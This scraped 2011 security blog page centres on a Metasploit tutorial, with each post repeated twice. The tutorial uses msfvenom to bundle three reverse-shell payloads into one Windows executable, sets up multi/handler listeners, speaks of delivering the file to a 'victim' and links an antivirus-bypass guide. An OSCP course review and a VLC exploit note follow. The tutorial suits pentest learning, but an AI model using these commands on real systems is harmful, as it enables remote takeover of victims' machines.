Thursday, March 8, 2012
Sunday, November 27, 2011
Binary Mischief With Msfencode
Good day Good Sirs
Today is a quick example of using msfencode. This is strictly the way i use it, there are more than likely better ways and methods. But this works for me. Hopefully you enjoy it. So here goes..
All of you may have heard and or used msfpayload and msfencode. But what you may not be aware of is msfvenom. Which is basically a replacement for two. As said before, this is only the way i use it. So first thing first, by running the msfvenom with no commands, you are shown the help information. This is shown below.
Now as you see, there are many options. I personally first decide what payload im going to use, by opening another terminal and running msfpayload -l |grep "whatever your looking for" so for instance: ./msfpayload -l |grep windows/meterpreter/reverse Which would give you output as seen below.
Now as you can see, we have a few payloads to choose from. I will be using the windows/meterpreter/reverse_tcp
So moving back to the terminal with msfvenom, i would utilize the following commands, the commands will be explained below.
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.116 LPORT=4444 -f raw > /tmp/pay1
Command explanation:
-p: chosen payload
LHOST=: the listening host
LPORT=: the listening port
-f: the format that you want your payload to be encoded as
raw: the reason I have used this, is i have intentions of adding this payload along with another one. So we dont want it encoded just yet. So basically its staying as shellcode for the time being
> /tmp/pay1 : telling msfvenom where to store our payload for later use.
Now go on to decide what your next payload you will use will be. So refer back to the msfpayload terminal and chose your next payload. I will be using the windows/shell/reverse_tcp
so my next commands within the msfvenom terminal would be as follows.
./msfvenom -p windows/shell/reverse_tcp -f raw LHOST=192.168.1.116 LPORT=4443 -c /tmp/pay1 -k > /tmp/pay2
command explanation:
-p: the payload to use
-f: format to keep the payload in.
LHOST=: the listening host
LPORT=: the Listening port
-c: telling msfvenom that you want to combine extra shell code to the current payload. ensure you give full path to this shellcode"payload" to add.
-k: to keep the payload working by running it within another thread.
Now decide on a third payload. I do this by refering back to my msfpayload terminal and pick from there. I will be using the windows/shell/reverse_tcp_allports so the commands will look like below. Remember to pay attention, because now we will be adding the payloads together and having the format be an executable.
./msfvenom -p windows/meterpreter/reverse_tcp_allports -f exe LHOST=192.168.1.116 LPORT=2 -c /tmp/pay2 > /tmp/pay3.exe
commands explained:
-p: the payload to be used
-f: the format for your payload
LHOST=: the listening host.
LPORT=: the listening port.
-c: telling msfvenom to add some shell code. be sure to give full path to the shell code you wanna add.
below is a picture of all three commands in succession.
Now you have three payloads in one. So you will need to setup three listeners. What i do, is open up three terminals and load msfconsole using the commands as followed:
cd /pentest/exploits/framework
./msfconsole
Just doing that three times will get you three different msfconsole sessions. now to setup listeners. Pick a terminal and do the following.
use exploit/multi/handler
now tell it what to listen for. so our first payload had the following options so... just input these in with the following commands
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 4444 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.
Now a new msfconsole session for our second payload, using the commands as followed.
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 4443 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.
Now onto listener three. In your thied msfconsole session input the following.
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 2 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.
Now all thats left is to get your executable over to your victim. This would take imagination in a real world pentest. But since im only testing. I simple copy it over to my webserver and download the executable to my Virtual machine. Then run it. If all went well, you will get three seperate shells. This could certainly be useful in situations of, wanting to send a shell to different machines. IE you could have multiple LHOSTs. Or if your not sure what type of egress rulsets are in place. But all in all. Its an amazing feature. Now notice, i didnt do any encoding, to bypass AV. Thats because i will send you to a great write up on bypassing anti-virus using a simaliar method. So if you take my "guide by example" and the following guide from http://www.fuzzysecurity.com/tutorials/3.html you should see some great results. I hope you enjoyed this quickly put together post. Please feel free to tell me what youd like to see next. as always, goodnight and good luck.
http://www.fuzzysecurity.com/tutorials/3.html <---check this out for encoding and bypassing Anti-virus
Today is a quick example of using msfencode. This is strictly the way i use it, there are more than likely better ways and methods. But this works for me. Hopefully you enjoy it. So here goes..
All of you may have heard and or used msfpayload and msfencode. But what you may not be aware of is msfvenom. Which is basically a replacement for two. As said before, this is only the way i use it. So first thing first, by running the msfvenom with no commands, you are shown the help information. This is shown below.
Now as you see, there are many options. I personally first decide what payload im going to use, by opening another terminal and running msfpayload -l |grep "whatever your looking for" so for instance: ./msfpayload -l |grep windows/meterpreter/reverse Which would give you output as seen below.
Now as you can see, we have a few payloads to choose from. I will be using the windows/meterpreter/reverse_tcp
So moving back to the terminal with msfvenom, i would utilize the following commands, the commands will be explained below.
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.116 LPORT=4444 -f raw > /tmp/pay1
Command explanation:
-p: chosen payload
LHOST=: the listening host
LPORT=: the listening port
-f: the format that you want your payload to be encoded as
raw: the reason I have used this, is i have intentions of adding this payload along with another one. So we dont want it encoded just yet. So basically its staying as shellcode for the time being
> /tmp/pay1 : telling msfvenom where to store our payload for later use.
Now go on to decide what your next payload you will use will be. So refer back to the msfpayload terminal and chose your next payload. I will be using the windows/shell/reverse_tcp
so my next commands within the msfvenom terminal would be as follows.
./msfvenom -p windows/shell/reverse_tcp -f raw LHOST=192.168.1.116 LPORT=4443 -c /tmp/pay1 -k > /tmp/pay2
command explanation:
-p: the payload to use
-f: format to keep the payload in.
LHOST=: the listening host
LPORT=: the Listening port
-c: telling msfvenom that you want to combine extra shell code to the current payload. ensure you give full path to this shellcode"payload" to add.
-k: to keep the payload working by running it within another thread.
Now decide on a third payload. I do this by refering back to my msfpayload terminal and pick from there. I will be using the windows/shell/reverse_tcp_allports so the commands will look like below. Remember to pay attention, because now we will be adding the payloads together and having the format be an executable.
./msfvenom -p windows/meterpreter/reverse_tcp_allports -f exe LHOST=192.168.1.116 LPORT=2 -c /tmp/pay2 > /tmp/pay3.exe
commands explained:
-p: the payload to be used
-f: the format for your payload
LHOST=: the listening host.
LPORT=: the listening port.
-c: telling msfvenom to add some shell code. be sure to give full path to the shell code you wanna add.
below is a picture of all three commands in succession.
Now you have three payloads in one. So you will need to setup three listeners. What i do, is open up three terminals and load msfconsole using the commands as followed:
cd /pentest/exploits/framework
./msfconsole
Just doing that three times will get you three different msfconsole sessions. now to setup listeners. Pick a terminal and do the following.
use exploit/multi/handler
now tell it what to listen for. so our first payload had the following options so... just input these in with the following commands
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 4444 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.
Now a new msfconsole session for our second payload, using the commands as followed.
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 4443 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.
Now onto listener three. In your thied msfconsole session input the following.
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 2 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.
Now all thats left is to get your executable over to your victim. This would take imagination in a real world pentest. But since im only testing. I simple copy it over to my webserver and download the executable to my Virtual machine. Then run it. If all went well, you will get three seperate shells. This could certainly be useful in situations of, wanting to send a shell to different machines. IE you could have multiple LHOSTs. Or if your not sure what type of egress rulsets are in place. But all in all. Its an amazing feature. Now notice, i didnt do any encoding, to bypass AV. Thats because i will send you to a great write up on bypassing anti-virus using a simaliar method. So if you take my "guide by example" and the following guide from http://www.fuzzysecurity.com/tutorials/3.html you should see some great results. I hope you enjoyed this quickly put together post. Please feel free to tell me what youd like to see next. as always, goodnight and good luck.
http://www.fuzzysecurity.com/tutorials/3.html <---check this out for encoding and bypassing Anti-virus
Saturday, November 12, 2011
OSCP Certified My Review and Bragging.
So if you know me, you know that i have been taking courses and certifications as fast as i can handle/afford. Well a while back i took the PWBv3 course from After alot of pain/studying/hacking/googling and torture from Muts and Subinacls, I finished the course, and took and passed the Exam. Script Alert("Applause"); /script
Well i have finally recieved my Certification in the mail...and if you want to see what it looks like, then there will be a link at the end of the post...So i thought i should give a quick rambling of my thoughts on the course. First, coming into the course your told that you can gain help by talking to folks and fellow students on the IRC channel #offsec. This is true and false... If you have a question about how to gain a shell via XSS or which metasploit exploit to use on a particular box..then my friend you just asked in the wrong channel. You will certainly get either "google it", "try harder", or no reply at all. This can be frustrating, but if you ask for an admin, and are having issues with the course material, or cant connect to a box, etc etc. Then Bolexx, Subinacls, sickn3ss or another admin will have your issues sorted within minutes. I honestly never had to wait more than a minute or two before i was answered and back to hacking.
Also, there is a forum that is private and only open to students, where there is a ton of info, external links, downloads, videos, guides, wiki links, and general student conversation...theres even an entire topic on music suggestions.
Along with the forum/IRC channel, there are the course videos/PDF that i think is over 8 hours of video and 400 pages of offensive-security ninja-fu.
The thing that i loved about this course is simple. I didnt have to setup a pentesting lab at my house, or just learn from the theory explained in the PDFs. Offensive-security provided me with an entire network to attack. Actually a network and three sub-networks. So as i learned new things and new attacks, i had a massive amount of systems to attack. Everything from windows 2k server to win7. I have heard rumor that there are some Macs hidden about, i unfortunately cant confirm this.
The course is extremely well covered. Basically Muts takes you from boot to root. Starting from just booting up backtrack to setting up services locally, to finally taking down services remotely. I would recommend this course to everyone who wants learn a bit about security and alot about yourself. As you will find out how deep down the rabbit hole you will go.
Also, another difference between this course and say CEH. The final exam isnt a 400 question written test. Its a 24 hour, active attack pentest on a network that is totally new to you. Basically, your given 24 hours to exploit a network, and record details of your findings. Just like a real pentest... the documentation is very important. After the 24 hours, you have another 24 hours to organize your data and send in the finding for review/grading. It is said that you Offsec can take up to three days to give your results, but i knew within 14 hours. In fact, i never had to wait long at all for a response from the folks at offsec.
Final thoughts: Anyone interested in being a Pentester, security-researcher, or just want to learn how your facebook or bank account gets hacked, and how to prevent it, should check this course out. Its intense, its pricey, but 100 percent worth it. I would take it again and again. In fact, i have already taken the Wifu course offered by Offensive-security. I will be giving a review of that also, as soon as i get around to it. As promised, here is the link of the certification if you want to see it.
Now go get it for yourself if you want to see it. ^^^ That is all you need to get started.
If you want to test your skills against the offsec team for free, then check this out.
Try your hand at that. and as always, goodnight and goodluck
-g11tch-
Well i have finally recieved my Certification in the mail...and if you want to see what it looks like, then there will be a link at the end of the post...So i thought i should give a quick rambling of my thoughts on the course. First, coming into the course your told that you can gain help by talking to folks and fellow students on the IRC channel #offsec. This is true and false... If you have a question about how to gain a shell via XSS or which metasploit exploit to use on a particular box..then my friend you just asked in the wrong channel. You will certainly get either "google it", "try harder", or no reply at all. This can be frustrating, but if you ask for an admin, and are having issues with the course material, or cant connect to a box, etc etc. Then Bolexx, Subinacls, sickn3ss or another admin will have your issues sorted within minutes. I honestly never had to wait more than a minute or two before i was answered and back to hacking.
Also, there is a forum that is private and only open to students, where there is a ton of info, external links, downloads, videos, guides, wiki links, and general student conversation...theres even an entire topic on music suggestions.
Along with the forum/IRC channel, there are the course videos/PDF that i think is over 8 hours of video and 400 pages of offensive-security ninja-fu.
The thing that i loved about this course is simple. I didnt have to setup a pentesting lab at my house, or just learn from the theory explained in the PDFs. Offensive-security provided me with an entire network to attack. Actually a network and three sub-networks. So as i learned new things and new attacks, i had a massive amount of systems to attack. Everything from windows 2k server to win7. I have heard rumor that there are some Macs hidden about, i unfortunately cant confirm this.
The course is extremely well covered. Basically Muts takes you from boot to root. Starting from just booting up backtrack to setting up services locally, to finally taking down services remotely. I would recommend this course to everyone who wants learn a bit about security and alot about yourself. As you will find out how deep down the rabbit hole you will go.
Also, another difference between this course and say CEH. The final exam isnt a 400 question written test. Its a 24 hour, active attack pentest on a network that is totally new to you. Basically, your given 24 hours to exploit a network, and record details of your findings. Just like a real pentest... the documentation is very important. After the 24 hours, you have another 24 hours to organize your data and send in the finding for review/grading. It is said that you Offsec can take up to three days to give your results, but i knew within 14 hours. In fact, i never had to wait long at all for a response from the folks at offsec.
Final thoughts: Anyone interested in being a Pentester, security-researcher, or just want to learn how your facebook or bank account gets hacked, and how to prevent it, should check this course out. Its intense, its pricey, but 100 percent worth it. I would take it again and again. In fact, i have already taken the Wifu course offered by Offensive-security. I will be giving a review of that also, as soon as i get around to it. As promised, here is the link of the certification if you want to see it.
Now go get it for yourself if you want to see it. ^^^ That is all you need to get started.
If you want to test your skills against the offsec team for free, then check this out.
Try your hand at that. and as always, goodnight and goodluck
-g11tch-
Saturday, November 5, 2011
Quick VLC Video
So like the title, a quick video with the stars being, VLC and Metasploit. As you can see, its exploitable. This attack is on a Windows XP SP3 machine using AVG anti-virus. The video is nothing special, as you will see, and not hear, there is no audio. I would rather work on my exploitation than my video editing skills. So hope you enjoy. Hopefully at the very least, you will look twice at whatever file your downloading from the net.
g11tch
g11tch
Subscribe to:
Posts (Atom)